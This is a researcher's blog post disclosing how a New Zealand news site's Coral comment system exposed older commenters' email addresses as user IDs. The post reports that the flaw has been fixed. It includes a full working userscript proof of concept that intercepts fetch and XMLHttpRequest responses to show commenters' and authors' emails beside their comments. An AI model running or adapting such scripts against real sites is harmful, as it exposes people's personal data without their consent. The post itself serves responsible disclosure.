Lifting PII from a News Website's Comment Section

How a poorly implemented 3rd-party commenting system can leak your personal data.

Update (2024-05-17): The problem has been properly fixed.

Introduction

For better or worse, this news website is one of New Zealand’s most popular online news sources. Its comment section has also earned a reputation as one of the most toxic places on the Kiwi internet that grandma is likely to stumble across.

About a month ago, this website had a frontend redesign, and I made a mental note to poke around for security flaws. Redesigns are usually a good source of bugs: so much changes at once that something is likely to be missed. This redesign was no exception; I found three issues with the new website.

I will discuss only one of these issues here, since there appears to be a mitigation in place for it. The other issues are still being fixed. Update: This is no longer the case; see Encryption, Stack Traces, and Name Suppression for another problem that has since been fixed.

Your Email Address is Public

This website requires that you create an account before commenting on its stories. This is good, since it gives the site an easy way to moderate content. When you create an account, you are also given a so-called “commenting username” that is used as your handle when you make a comment.

As you can see, I have no way of changing my own handle either.

This website doesn’t run its own commenting system. Instead it uses a 3rd-party service named Coral to handle all of the comments. This is useful, since they don’t have to maintain an entire commenting system. On the other hand, they lose a bit of flexibility and control over what is returned from Coral.

So, what is returned from Coral? It turns out that each comment comes back with not only the author’s “commenting username” but also their Coral user ID, which in many cases appears to be the email address the user signed up with. This poses a problem for this news website; I bet its users weren’t expecting that.
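To make that concrete, here is a minimal sketch of how email-shaped author IDs could be picked out of a comments response. The payload shape (`data.story.comments.edges`, `node.author.id`, `node.allChildComments`) is assumed from the fields the proof-of-concept userscript in this post reads; the sample data and the function names `flattenComments` and `findLeakedEmails` are made up for illustration.

```javascript
// Hypothetical sample shaped like the GraphQL payload the userscript reads.
// Every ID below is invented.
const sampleResponse = {
  data: {
    story: {
      comments: {
        edges: [
          {
            node: {
              id: "c1",
              author: { id: "jane@example.com" },
              allChildComments: {
                edges: [{ node: { id: "c2", author: { id: "48213" } } }],
              },
            },
          },
        ],
      },
    },
  },
};

// Flatten top-level comments and their replies into one list of nodes.
function flattenComments(response) {
  const edges = response?.data?.story?.comments?.edges ?? [];
  return edges.flatMap((edge) => [
    edge.node,
    ...(edge.node.allChildComments?.edges ?? []).map((child) => child.node),
  ]);
}

// Return the comments whose author ID looks like an email address.
function findLeakedEmails(response) {
  return flattenComments(response)
    .filter((comment) => String(comment.author.id).includes("@"))
    .map((comment) => ({ commentId: comment.id, email: comment.author.id }));
}

console.log(findLeakedEmails(sampleResponse));
```

The `includes("@")` check is the same crude heuristic the userscript uses; it is enough to tell an email apart from a numeric ID, not to validate an address.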

Proving the Point

I can’t very well file a bug report without creating a proof-of-concept to drive home how bad this misconfiguration really is. So, I introduce to you the Comment Deanonymiser userscript (see Tampermonkey for more information about userscripts).

// ==UserScript==
// @name         Comment Deanonymiser
// @namespace    https://jesse.hacks.nz/
// @version      2024-02-07
// @description  Shows authors' and commenters' email address where available.
// @author       Jesse Sheehan
// @match        https://www.website-name.co.nz/*
// @grant        none
// @run-at       document-start
// ==/UserScript==

(function() {
    'use strict';
    const log = console.log;
    const comments = [];
    let pollHandle = null;
    let commentRoot = null;

    const originalFetch = fetch;
    window.fetch = async function() {
        const response = await originalFetch.apply(this, arguments);

        const url = new URL(response.url);
        if (url.pathname === "/api/graphql" && url.hostname.endsWith(".coral.coralproject.net")) {
            // Parse a clone so the page's own code can still read the original body.
            const content = await response.clone().json();
            if (content && content.data && content.data.story && content.data.story.comments && content.data.story.comments.edges) {
                const edges = content.data.story.comments.edges;
                // log("handling edges", edges);
                handleLoadedComments(edges);
            } else {
                // log("Could not handle", content);
            }
        }

        return response;
    };

    const originalOpen = XMLHttpRequest.prototype.open;
    XMLHttpRequest.prototype.open = function() {
        this.addEventListener('load', function() {
            if (this.readyState === 4 && this.status.toString().startsWith("2")) {
                handleLoadedResource(this);
            }
        });
        originalOpen.apply(this, arguments);
    };

    window.addEventListener("load", () => {
        document.body.addEventListener("DOMNodeInserted", (event) => {
            if (event.target.nodeName === "#text" || event.target.tagName !== "DIV" || event.target.parentNode.id !== 'coral_thread') return;
            if (pollHandle === null) {
                pollHandle = setInterval(pollShadowRoot, 100);
            }

        }, false);
    });

    function handleLoadedResource(response) {
        const url = new URL(response.responseURL);
        if (/story\/[0-9]+$/.test(url.pathname)) {
            handleLoadedStory(JSON.parse(response.response));
        }
    }

    function handleLoadedStory(content) {
        const authorDetails = content.author;

        if (authorDetails.length === 0) return;

        const parentElement = document.querySelector(".stuff-box.author-names");
        parentElement.replaceChildren();
        for (let author of authorDetails) {
            const child = document.createElement("p");
            const anchor = document.createElement("a");
            anchor.href = `mailto:${author.email}`;
            anchor.innerText = `${author.name} (${author.email})`;
            child.appendChild(anchor);
            parentElement.appendChild(child);
        }
    }

    function handleLoadedComments(edges) {

        edges
            .flatMap(e => [e.node, ...e.node.allChildComments.edges.map(x => x.node)])
            .forEach(comment => comments.push(comment));
        handleCommentsUpdate();

    }

    function pollShadowRoot() {
        if (commentRoot !== null) {
            clearInterval(pollHandle);
            pollHandle = null;
            return;
        }

        const commentParent = document.getElementById("coral_thread");
        //log(commentParent);

        if (commentParent.children.length > 0 && commentParent.querySelector("div").shadowRoot) {

            const shadowRoot = commentParent.querySelector("div").shadowRoot;
            log(shadowRoot);

            let shadowRootPollInterval = setInterval(() => {
                commentRoot = shadowRoot.getElementById("coral");
                if (commentRoot) {
                    commentRoot.addEventListener("DOMNodeInserted", (event) => {
                        handleCommentsUpdate();
                    });
                    clearInterval(shadowRootPollInterval);
                }
            }, 50);

            clearInterval(pollHandle);
            pollHandle = null;
        }
    }

    function handleCommentsUpdate() {
        if (comments.length === 0 || commentRoot === null) return;

        const readyComments = comments.flatMap((comment) => {
            const selector = `#comment-${comment.id}:not([demasked])`;
            const elements = [...commentRoot.querySelectorAll(selector)];

            if (!elements.length) return [];
            return elements.map(element => ([element, comment]));
        });

        readyComments.forEach(([element, comment]) => {

            const usernameElement = element.querySelector("div[class^='Comment-username-']");

            const newChild = document.createElement("div");
            newChild.style.paddingRight = "0.5em";

            const anchor = document.createElement("a");
            if (comment.author.id.includes("@")) {
                anchor.href = "mailto:" + comment.author.id;
            }
            anchor.innerText = comment.author.id;

            newChild.appendChild(anchor);

            usernameElement.parentElement.insertBefore(newChild, usernameElement.parentElement.lastChild);
            element.setAttribute("demasked", "true");
        });

        if (comments.length > 0) {
            setTimeout(handleCommentsUpdate, 1000);
        }
    }
})();

This will extract that delicious PII and display it right next to each comment.

An example of the userscript running. Email addresses redacted for obvious reasons.

It should be noted that not all of this website’s users have their email as their Coral identifier. It seems that if you create a new account today, you will have an integer as your ID. This makes me suspect that only older accounts (probably migrated from their old comment system) are at risk here.

Other Websites

So, does this mean that all the other websites out there that use Coral are also giving out PII like it’s a lolly scramble? Well, no. It doesn’t appear to be the case. Of the several dozen websites that use Coral, all seem to use either an integer or a GUID for their users’ IDs. So the problem appears to have more to do with how this website has chosen to identify its users than with a flaw inherent in Coral.

NewsTalkZB also uses Coral, but uses GUIDs instead of email addresses for identification.
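The three kinds of ID mentioned above are easy to tell apart mechanically. The following is a rough sketch of such a check, not the exact method I used when surveying other sites; the function name `classifyUserId`, the patterns, and the sample IDs are all assumptions for illustration.

```javascript
// Rough patterns for the ID styles discussed in this post.
const GUID_PATTERN =
  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
const INTEGER_PATTERN = /^[0-9]+$/;

// Classify a user ID as "email", "integer", "guid", or "unknown".
function classifyUserId(id) {
  const value = String(id);
  if (value.includes("@")) return "email"; // the only style that leaks PII
  if (INTEGER_PATTERN.test(value)) return "integer";
  if (GUID_PATTERN.test(value)) return "guid";
  return "unknown";
}

// Made-up IDs, one per style.
const exampleIds = [
  "jane@example.com",
  "48213",
  "3f2b8c1e-9a4d-4e6f-8b7a-1c2d3e4f5a6b",
];
for (const id of exampleIds) {
  console.log(`${id} -> ${classifyUserId(id)}`);
}
```

Only the "email" result is a concern here: integers and GUIDs are opaque to anyone outside the site.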

Disclosure

I reported this issue to the website’s owners on February 7. It was acknowledged on February 8, and it appears that the commenting system was taken down before February 10. Presumably, they’ve changed the CORS settings for their Coral server as a stop-gap while they remove the PII. I am very happy with how quickly they’ve handled this situation.

The current state of the comments section.

Extra: Déjà Vu

Almost 11 years ago, I discovered a similar flaw in this website’s comment section. It was almost exactly the same, in fact. But it had a far less satisfying outcome.

The website used to allow users to sign in with a social login (e.g. Twitter/X, Facebook, etc.). If a user did this and then commented on an article, the URL of their social media profile would be sent down to everyone who viewed the comment. So I did what I did here: I made a proof-of-concept and submitted my findings. After a phone call and some email back-and-forth, a decision was reached!

An email from their editor confirmed that they would just change their terms of service to make this okay. 🤷 I’m glad they are taking the issue more seriously now.

Update (2024-05-17)

It’s been a few months and I’ve noticed that the comments system has been reinstated. A data migration has taken place where the user IDs in Coral have been replaced by the user’s account ID (instead of their email address). This is a welcome change when compared to the error message previously seen when viewing the comments sections. Now you can comment on articles with the confidence that your email isn’t being leaked.

The user IDs have been fixed so that they don't leak information.
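I have no visibility into how the site actually performed its migration, but the general idea of swapping an email-based ID for an opaque account ID can be sketched as follows. The lookup table, the account ID values, and the function name `migrateAuthorId` are all hypothetical.

```javascript
// Hypothetical lookup from the old email-based ID to an opaque account ID.
const accountIdByEmail = new Map([["jane@example.com", "100245"]]);

// Return a copy of the comment with its author ID swapped for the account ID.
// IDs that are not in the lookup (for example, already-opaque ones) are kept.
function migrateAuthorId(comment, lookup) {
  const newId = lookup.get(comment.author.id) ?? comment.author.id;
  return { ...comment, author: { ...comment.author, id: newId } };
}

// Made-up comments: one with an email ID, one with a numeric ID.
const before = [
  { id: "c1", author: { id: "jane@example.com" } },
  { id: "c2", author: { id: "48213" } },
];
const after = before.map((comment) => migrateAuthorId(comment, accountIdByEmail));

console.log(after.map((comment) => comment.author.id));
```

After a change like this, anything a reader’s browser receives identifies the commenter only by an ID that means nothing outside the site.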

Cover photo by Ashni on Unsplash